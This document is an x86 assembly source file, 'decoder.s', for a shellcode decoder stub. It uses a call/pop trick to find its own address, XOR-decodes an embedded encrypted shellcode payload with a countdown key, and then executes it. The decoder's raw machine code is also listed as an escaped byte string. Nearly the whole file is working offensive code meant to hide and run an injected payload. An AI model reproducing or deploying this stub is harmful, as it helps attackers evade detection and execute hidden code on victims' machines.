x86 decoder.s

Decodes encoded shellcode(key : ff-index) and executes.

.globl main

 .type main, @function

main:

# magic

nop

nop

xorl %eax, %eax

nop

nop

# call 0

.byte 0xe8, 0x00, 0x00, 0x00, 0x00

# esp == eip

mov (%esp), %esi

add $0x13, %esi # decryptor size : 19byte

xorl %ecx, %ecx

movb $0xff, %cl # shellcode length

loops:

movb (%esi), %al

xorb %cl, %al # xor with length-index

movb %al, (%esi)

inc %esi

loop loops

# encrypted shellcode payload

.byte 0xce,0x3e,0xad,0x02,0x3b,0xaa,0x07,0x38,0xa7,0x46,0x94,0xa4,0x3e,0x72,0x78,0x32,0x87,0x61,0x15,0x33,0xb1,0x82,0x43,0xea,0x5c,0x5d,0x6c,0x04,0x89,0xf2,0xb1,0xb2,0xee,0x1e,0x6d,0xbe,0x8b,0x17,0x59,0x69,0xd4,0xe7,0x0e,0x87,0x81,0x62,0x8b,0x80,0x02,0x4e,0x8e,0x2e,0x3d,0xfb,0x09,0x98,0xaf,0xe9,0xea,0xb7,0xab,0xaa,0xee,0xa2,0xd6,0xd0,0x34,0x5f,0xeb,0xe9,0x30,0x59,0xe7,0xe7,0xe6,0xe4,0x03,0x89,0x7c,0x30

# magic

nop

nop

xorl %eax, %eax

nop

nop

machine code output of decoder.

\xe8\x00\x00\x00\x00\x8b\x34\x24\x83\xc6\x13\x31\xc9\xb1\xff\x8a\x06\x30\xc8\x88\x06\x46\xe2\xf7